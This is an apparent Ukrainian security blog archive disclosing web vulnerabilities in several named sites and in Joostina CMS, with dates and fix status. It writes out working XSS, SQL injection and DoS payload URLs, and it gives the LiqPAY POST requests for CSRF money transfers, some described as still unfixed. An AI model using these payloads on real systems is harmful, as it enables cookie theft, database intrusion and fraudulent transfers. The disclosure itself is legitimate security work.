Архів для категорії 'Уразливості'

Уразливість на kpi-telecom.kpi.ua

15:01 08.01.2011

24.05.2010

У жовтні, 22.10.2009, я знайшов Cross-Site Scripting уразливість на сайті http://kpi-telecom.kpi.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.01.2011

XSS:

Дана уразливість досі не виправлена.

Нові уразливості на filestore.com.ua

19:19 07.01.2011

20.05.2010

У жовтні, 21.10.2009, а також додатково сьогодні, я знайшов Denial of Service, Full path disclosure, SQL Injection та Cross-Site Scripting уразливості на проекті http://filestore.com.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на filestore.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

07.01.2011

DoS:

http://filestore.com.ua/search.php?search=%25%25%25&sort=downloadsdesc&type=filename

Full path disclosure:

http://filestore.com.ua/search.php?search=1&type=’

http://filestore.com.ua/search.php?search=1&sort=’

SQL Injection:

http://filestore.com.ua/search.php?search=1&sort=downloadsdesc&type='%20or%201='1
http://filestore.com.ua/search.php?search=1&sort='%20or%201='1&type=filename

XSS:

http://filestore.com.ua/search.php?search=1&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&type=filename
http://filestore.com.ua/search.php?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=downloadsdesc&type=filename
http://filestore.com.ua/login.php?act=getpass&user=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://filestore.com.ua/login.php?act=getpass&email=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені.

Нова уразливість в Joostina

23:56 06.01.2011

Сьогодні я знайшов Cross-Site Scripting уразливість в системі Joostina. Joostina CMS - це різновид Joomla. Про що найближчим часом повідомлю розробникам.

Уразливість, як і в попередньому випадку, виявив на секюріті сайті http://ufsb.kiev.ua, де використовується даний движок. Адміни якого, як і раніше, не слідкують за безпекою свого сайта.

Раніше я вже писав про уразливість в Joostina.

Дана уразливість подібна до Cross Site Scripting уразливості в Joomla! 1.0.x . Що нещодавно була виявлена та оприлюднена Aung Khant.

XSS (з MouseOverJacking):

http://site/index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22

XSS на http://ufsb.kiev.ua:

Уразливі Joostina 1.3.0 та попередні версії.

Добірка уразливостей

22:43 06.01.2011

В даній добірці уразливості в веб додатках:

Уразливість на cripo.com.ua

15:28 06.01.2011

18.05.2010

У жовтні, 17.10.2009, я знайшов HTML Injection уразливість на проекті http://cripo.com.ua (онлайн ЗМІ, що також пише на тему безпеки). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

06.01.2011

XSS:

http://cripo.com.ua/?q=%3Cxss%3E

На сайті потенційно була можлива і XSS, при обході ModSecurity.

HTML Injection:

http://cripo.com.ua/?q=%3Ch1%3EHacked

Зараз дана уразливість виправлена шляхом посилення фільтрації. Але виправлена неякісно і атаки все ще можливі.

HTML Injection:

Уразливості на www.sprinter.ru

15:04 05.01.2011

24.07.2009

У листопаді, 30.11.2008, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://www.sprinter.ru (інтернет магазин). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на matrix.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

05.01.2011

XSS:

Дану уразливість вони спробували виправити, але погано, тому з невеликою зміною коду вона знову працює.

XSS:

Insufficient Anti-automation:

На сторінках з книгами використовується уразлива капча (в формі коментарів).

XSS (persistent):

На сторінках з книгами є persistent XSS уразливість в полі “сообщение” (в параметрі bigtext форми).

Дані уразливості досі не виправлені.

Нові уразливості на www.bezpeka.com

15:23 04.01.2011

11.05.2010

У жовтні, 16.10.2009, я знайшов Cross-Site Scripting та Redirector уразливості на секюріті проекті http://www.bezpeka.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на bezpeka.com.

Детальна інформація про уразливості з’явиться пізніше.

04.01.2011

XSS:

POST запит на сторінку http://www.bezpeka.com/ru/news/send.php з XSS кодом в параметрі back_href.

XSS через GET:

Redirector:

POST запит на сторінку http://www.bezpeka.com/ru/news/send.php з адресою сайта для редирекції в параметрі back_href.

Дані уразливості досі не виправлені.

Уразливості в плагінах для WordPress №24

21:23 31.12.2010

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WPTouch та Viva thumbs. Для котрих з’явилися експлоіти. WPTouch - це плагін для створення мобільної версії сайта, Viva thumbs - це плагін для створення зменшених копій зображень.

  • XSS in WPTouch wordpress plugin (деталі)
  • Directory traversal limited to file validation within Viva thumbs WordPress add-on (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

15:04 31.12.2010

В даній добірці уразливості в веб додатках:

  • TANDBERG VCS Authentication Bypass (деталі)
  • TANDBERG VCS Arbitrary File Retrieval (деталі)
  • TANDBERG VCS Static SSH Host Keys (деталі)
  • Dovecot vulnerability (деталі)
  • SQL injection vulnerability in TCMS (деталі)
  • SQL injection vulnerability in TCMS (деталі)
  • HP System Insight Manager Running on HP-UX, Linux, and Windows, Remote Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Privilege Elevation (деталі)
  • SQL injection vulnerability in TCMS (деталі)
  • File Content Disclosure in TCMS (деталі)
  • Openfire Jabber-Server: Multiple Vulnerabilities (Authentication Bypass, SQL injection, Cross-Site Scripting) (деталі)

Business Logic уразливості на www.liqpay.com

23:51 30.12.2010

Продовжу свою серсію записів про Business Logic уразливості на різних e-commerce сайтах. В статті Business Logic уразливості через CSRF я писав про Business Logic уразливості, що дозволяють маніпулювати фінансовими даними користувачів. Які можна ініціювати через CSRF атаки.

Після www.propage.ru в якості приклада таких уразливостей наведу уразливості на www.liqpay.com - електроній платіжній системі LiqPAY. Враховучи, що після оприлюднення мною попередніх уразливостей в LiqPAY, ПриватБанк проігнорував їх, я оприлюднюю їх одразу (full disclosure).

У листопаді, 15.11.2009, я знайшов Cross-Site Request Forgery та Insufficient Process Validation уразливості на сайті https://www.liqpay.com. Які дозволяють переводити гроші на інші рахунки LiqPAY чи на карти. Про що найближчим часом сповіщу адміністрацію сайта.

Виводити гроші з рахунків і карт користувачів можна через обідві уразливості (CSRF і Insufficient Process Validation). Дані уразливості наявні в двох функціоналах системи, тому можливі атаки на кожну з них: для виведення на інший рахунок LiqPAY і для виведення на карту. Тобто всього 4 уразливості.

CSRF:

Функціонали виведення грошей на інший LiqPAY акаунт і на карту вразливі до CSRF.

Для виведення коштів на інший LiqPAY акаунт потрібно відправити два запити:

POST запит на https://www.liqpay.com/?do=transfer_create&to=to_phone

do=from_phone_to_phone_confirm&currency=USD&to_phone=_num_&amount=1000&currency2=USD&special=transfer_create

POST запит на https://www.liqpay.com/?do=transfer_create&to=to_phone
do=from_phone_to_phone_result

Для виведення коштів на карту потрібно відправити два запити:

POST запит https://www.liqpay.com/?do=transfer_create&to=to_card

do=from_phone_to_card_confirm&currency=USD&to_card=_num_&amount=1000&currency2=USD&special=transfer_create

POST запит https://www.liqpay.com/?do=transfer_create&to=to_card
do=from_phone_to_card_result

Insufficient Process Validation:

В фунціоналах виведення коштів на інший LiqPAY акаунт і на карту немає перевірки автентичності запиту - через отримання sms-ки з кодом і введення даного коду. Тому OTP вводиться лише при логіні, а всі транзакції в системі не підтверджуються OTP. При тому, що подібний захист існує в Приват24. Але чомусь в LiqPAY ПриватБанк цього не зробив (мабуть бажаючи “спростити” цей процес для користувачів), що призвело до значного погіршення безпеки, особливо враховучи CSRF уразливості.

Виправлення CSRF не вирішить проблеми повністю. Тому що гроші з рахунків користувачів можна бути виводити через XSS, при доступі до мобільника користувача, через віруси або при тимчасовому доступі до комп’ютера. Тому потрібно виправляти також і Insufficient Process Validation.